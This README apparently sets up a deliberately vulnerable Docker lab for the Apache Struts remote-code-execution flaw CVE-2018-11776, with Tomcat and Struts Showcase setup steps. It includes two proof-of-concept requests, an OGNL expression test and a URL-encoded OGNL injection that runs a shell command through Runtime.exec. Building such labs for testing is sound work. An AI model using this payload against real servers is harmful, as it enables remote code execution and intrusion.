
CVE-2018-11776 PoC — Apache Struts input validation error vulnerability

Source
Associated Vulnerability
Title: Apache Struts input validation error vulnerability (CVE-2018-11776)
Description: Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either set by the user or by a plugin like the Convention Plugin) and then: results are used with no namespace and, at the same time, their upper package has no or a wildcard namespace; similarly, the same possibility exists when using the url tag with no value and action set and, at the same time, its upper package has no or a wildcard namespace.
Description: Vulnerable docker container for CVE-2018-11776

Readme
## Vulnerable docker container for CVE-2018-11776

    # docker pull bhdresh/cve-2018-11776:1.0
    # docker run -dit -p <IP ADDRESS>:8080:8080 bhdresh/cve-2018-11776:1.0

### PoC

##### PoC - 1
   
    Request : http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/${333+333}/help.action
    Result  : http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/666/help.action
    
##### PoC - 2

    Request : http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27touch /tmp/vulnerable%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/help.action
    Result  : This would create a file named 'vulnerable' in the /tmp/ directory of the docker container
    
    
## Steps to create vulnerable docker container

##### Create a Dockerfile

    FROM ubuntu:latest
    RUN apt-get update -y
    RUN apt-get upgrade -y
    RUN apt-get dist-upgrade -y
    RUN apt-get install default-jdk vim net-tools wget -y
    EXPOSE 8080


##### Build a docker

    # docker build -t cve-2018-11776 .


##### Start a docker

    # docker run --name cve-2018-11776 -p <IP ADDRESS>:8080:8080 -dit cve-2018-11776 /bin/bash

##### Login to docker

    # docker exec -it cve-2018-11776 /bin/bash

##### Make the following changes inside docker

###### Set up Tomcat:

    # mkdir ~/sources
    # cd ~/sources
    # wget http://mirrors.ocf.berkeley.edu/apache/tomcat/tomcat-7/v7.0.90/bin/apache-tomcat-7.0.90.tar.gz
    # tar xvzf apache-tomcat-7.0.90.tar.gz
    # mv apache-tomcat-7.0.90 /opt/tomcat

###### Update bashrc with variables:

    # vim ~/.bashrc
    
    export JAVA_HOME=/usr/lib/jvm/default-java
    export CATALINA_HOME=/opt/tomcat
    
    # . ~/.bashrc

###### Add an admin to the Tomcat gui:

    # vim /opt/tomcat/conf/tomcat-users.xml
    
    <user username="username" password="test-cve-2018-11776" roles="manager-gui,admin-gui" />

###### Start Tomcat server

    # $CATALINA_HOME/bin/startup.sh

###### Upload and deploy a vulnerable Struts2 Showcase through tomcat UI

    http://<IP ADDRESS>:8080 (log in with the user added to tomcat-users.xml above: username "username", password "test-cve-2018-11776")

###### Restart Tomcat

    # $CATALINA_HOME/bin/shutdown.sh
    # $CATALINA_HOME/bin/startup.sh


###### Add a vulnerable redirection action without a namespace:

    # vim /opt/tomcat/webapps/struts2-showcase-2.3.14/WEB-INF/classes/struts.xml

    <action name="help">
        <result type="redirectAction">
            <param name="actionName">date.action</param>
        </result>
    </action>

    NOTE: By default (in the Showcase configuration), alwaysSelectFullNamespace should already be set to true.

###### Restart Tomcat and check out the Struts2 Showcase page:
    
    # $CATALINA_HOME/bin/shutdown.sh
    # $CATALINA_HOME/bin/startup.sh
    
    http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/showcase.jsp

### Author

@bhdresh

### References

https://github.com/xfox64x/CVE-2018-11776

https://github.com/jas502n/St2-057